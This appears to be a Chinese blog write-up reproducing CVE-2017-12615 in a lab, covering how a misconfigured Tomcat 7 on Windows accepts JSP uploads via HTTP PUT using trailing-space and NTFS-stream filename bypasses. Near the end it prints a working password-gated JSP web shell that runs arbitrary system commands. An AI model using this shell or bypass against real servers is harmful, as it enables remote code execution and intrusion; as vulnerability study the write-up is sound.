CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution)

CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution)

一、漏洞原理

在windows服务器下,将readonly参数设置为false时,即可通过PUT方式创建一个jsp文件,并可以执行任意代码。Tomcat版本内web.xml配置内无readonly,需要手工添加,默认配置不受此影响。

二、影响版本

Apache Tomcat 7.0.0-7.0.79(Windows环境下)

三、漏洞利用条件

目标是windows环境

目标tomcat的版本7.0.0-7.0.79

管理员配置不当,设置了readonly,并且其值为false

上传目标的地方具有写入权限

四、环境搭建

Java环境(jdk 1.7)

Tomcat环境(tomcat 7.0.70)

五、漏洞复现

1.测试tomcat环境

   

CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution)

2.修改web.xml,tomcat版本内web.xml默认没有readonly,首要手工添加,将readonly参数设置为false时,然后就能通过PUT方式创建一个jsp文件,并可以执行任意代码。

  

CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution)

3.搜索漏洞库,根据poc说明验证漏洞的存在

  

CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution)

4.启动tomcat,burp抓包,利用PUT请求创建文件,上传内容后,发现上传失败,提示404

  

CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution)

5.根据漏洞描述中windows环境受影响,可以尝试利用windows的特性(文件名不能以空格结尾,NTFS文件流)来绕过限制

5.1利用文件名不能为空格,在文件名后加空格上传文件,上传失败,提示403

  

CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution)

5.2提示403,一般可能是因为上传的目标文件夹没有写入权限。查看权限发现目标没有写入权限。

  

CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution)

5.3给目标文件夹加入写入权限,然后测试

  

CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution)

5.4浏览器访问上传的文件

  

CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution)

5.5尝试NTFS文件流,成功上传

  

CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution)

5.6浏览器测试

  

CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution)

5.7构造特殊后缀名绕过tomcat检测

  

CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution)

6.通过以上poc可以证明目标存在文件上传漏洞,上传jsp一句话木马

<%

if("023".equals(request.getParameter("pwd"))){

java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();

int a = -1;

byte[] b = new byte[2048];

out.print("<pre>");

while((a=in.read(b))!=-1){

out.println(new String(b));

}

out.print("</pre>");

}

%>

  

CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution)

7.浏览器访问构造参数,下图可以说明目标存在远程代码执行漏洞

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/zgwjyf.html